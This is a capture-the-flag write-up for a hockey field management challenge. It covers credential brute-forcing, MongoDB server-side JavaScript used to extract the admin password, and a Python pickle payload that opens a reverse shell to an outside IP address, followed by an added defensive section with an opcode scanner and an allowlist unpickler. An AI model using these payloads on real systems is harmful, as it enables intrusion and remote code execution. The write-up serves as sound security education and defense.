CURLing 500 - Hockey Field Management System

The first step was to brute-force the authentication form with Burp Intruder:
     => debug : debug

After seeing that "return version();" output 2.4.9, we figured out the backend was MongoDB.
We already knew there was an admin account, because the login form returns two different errors:
* Invalid login - when the user does not exist
* Invalid password - when only the password is wrong

So the next step was to extract the admin password from MongoDB with server-side JavaScript:
function()
{
	// list the field names of the first document in the 'users' collection
	var a = '';
	for(var key in db.getCollection('users').find().toArray()[0])
	{
		a = a.concat(key, ', ')
	}

	return "".concat(a)
}
     => _id, login, pwd

function()
{
	// read the pwd field of the second document (the admin account)
	return "".concat(db.getCollection('users').find().toArray()[1].pwd)
}
     => firststeptoflag-done <- admin password

The next part was a Python pickle exploit: we could execute code on the server by sending it a crafted pickle.
Run the code signer.
import pickle, os

# command that pickle will run on the server when the payload is loaded
REVERSE_SHELL = """\
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("54.229.84.61",1337));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'"""

class RunCmd(object):
    # __reduce__ tells pickle to reconstruct this object by calling
    # os.system(REVERSE_SHELL), so the command runs during unpickling
    def __reduce__(self):
        return (os.system, (REVERSE_SHELL,))

# task message dict in the shape the server expects; the 'payload' entry
# carries the object whose __reduce__ fires on load
s = {'timelimit': (None, None), 'utc': True, 'chord': None, 'args': (23, 42),
     'retries': 0, 'expires': None, 'task': 'app.test_task', 'callbacks': None,
     'errbacks': None, 'taskset': None, 'kwargs': {}, 'eta': None,
     'id': 'a3d9c986-c461-45f0-93fa-9b0e929a2b37', 'payload': RunCmd()}

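The reason the trick above works is that pickle.load runs whatever callable a stream names via GLOBAL/STACK_GLOBAL followed by REDUCE. The defensive counterpart is to never unpickle untrusted bytes with plain pickle.loads, and to enforce an allowlist in find_class, which runs before REDUCE can call anything. The following is an added example from the editor, not code from the write-up or the challenge: a static opcode triage with pickletools plus a restricted Unpickler. The task-message samples, the HarmlessGadget class (the write-up's __reduce__ trick pointed at os.getcwd instead of os.system) and the allowlist contents are constructed for the demonstration.

```python
import datetime
import io
import os
import pickle
import pickletools

# Opcodes that can import a callable or invoke one while a stream is loaded.
# A message that should be plain data (dicts, strings, ints, tuples, None)
# has no business containing any of them.
IMPORT_OR_CALL_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
    "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD",
}

# (module, name) pairs an untrusted stream may import (constructed allowlist).
# Everything else, including posix.system, subprocess.*, builtins.eval, is refused.
ALLOWED_GLOBALS = {("datetime", "datetime")}


def suspicious_opcodes(data: bytes) -> list[str]:
    """Static triage: list import/call opcodes in a pickle without loading it."""
    seen = {op.name for op, _arg, _pos in pickletools.genops(data)}
    return sorted(seen & IMPORT_OR_CALL_OPCODES)


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose find_class enforces ALLOWED_GLOBALS.

    find_class is invoked when GLOBAL/STACK_GLOBAL is processed, i.e. before
    the following REDUCE opcode can call anything, so a rejected gadget never runs.
    """

    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_loads(data: bytes):
    """Drop-in replacement for pickle.loads that goes through the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if safe_loads refuses the stream."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class HarmlessGadget:
    """Constructed stand-in for the write-up's RunCmd: same __reduce__ trick,
    but pointing at os.getcwd instead of os.system."""

    def __reduce__(self):
        return (os.getcwd, ())


# Constructed sample messages, shaped like the task dict in the write-up.
BENIGN_MESSAGE = pickle.dumps({"task": "app.test_task", "args": (23, 42), "kwargs": {}})
TIMED_MESSAGE = pickle.dumps({"task": "app.test_task",
                              "eta": datetime.datetime(2024, 1, 1, 12, 0)})
GADGET_MESSAGE = pickle.dumps({"task": "app.test_task", "payload": HarmlessGadget()})


if __name__ == "__main__":
    for label, msg in [("benign", BENIGN_MESSAGE), ("timed", TIMED_MESSAGE),
                       ("gadget", GADGET_MESSAGE)]:
        print(label, "opcodes:", suspicious_opcodes(msg), "rejected:", is_rejected(msg))
```

The opcode scan is only a triage signal: TIMED_MESSAGE legitimately contains STACK_GLOBAL and REDUCE because datetime objects pickle through their class, which is exactly why the allowlist in find_class, not the scan, is the enforcement point. For a queue that only ever carries plain data, an empty allowlist is the right default.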
After reading app.py we found that Redis was used as the data store, and we also got the Redis password from the source code.
Now we just had to do the final trick:

redis-cli -a pwd
GET flag
     => CTF{...}